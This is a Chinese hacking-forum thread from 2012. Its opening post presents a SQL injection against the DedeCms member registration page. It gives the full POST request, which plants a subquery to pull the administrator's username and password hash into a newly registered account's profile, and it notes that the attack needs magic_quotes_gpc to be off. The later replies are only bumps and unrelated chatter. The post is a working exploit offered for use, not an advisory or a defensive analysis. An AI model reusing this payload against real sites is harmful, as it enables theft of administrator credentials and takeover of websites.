查看: 2275|回复: 25

老树新花DedeCms SQL注射漏洞再利用

[复制链接]
发表于 2012-12-5 07:34:51 | 显示全部楼层 |阅读模式
dedecms版本 20121122

需要magic_quotes_gpc=Off


应该是没有什么大危害的漏洞.


原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.


是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.


POST提交以下数据,其实不用POST提交的,这样隐蔽点.


http:///de/member/reg_new.php


POST

dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'[email protected]',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=

成功注册后,头像处里面有好玩的信息.

发表于 2012-12-6 21:34:13 | 显示全部楼层
哦...............  
发表于 2012-12-9 05:52:55 | 显示全部楼层
有空一起交流一下  
发表于 2012-12-19 22:07:37 | 显示全部楼层
先顶后看  
发表于 2014-11-5 00:47:11 | 显示全部楼层
不错不错.,..我喜欢  
发表于 2014-11-17 19:58:09 | 显示全部楼层
接到陌生电话请先说,“你好,找哪位”  
发表于 2014-12-5 07:22:18 | 显示全部楼层
回复一下  
发表于 2014-12-28 11:37:21 | 显示全部楼层
琴棋书画不会,洗衣做饭嫌累。  
发表于 2015-1-28 10:59:26 | 显示全部楼层
今天没事来逛逛,看了一下,感觉相当的不错。  
发表于 2015-3-2 06:47:03 | 显示全部楼层
强人,佩服死了。呵呵,不错啊  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则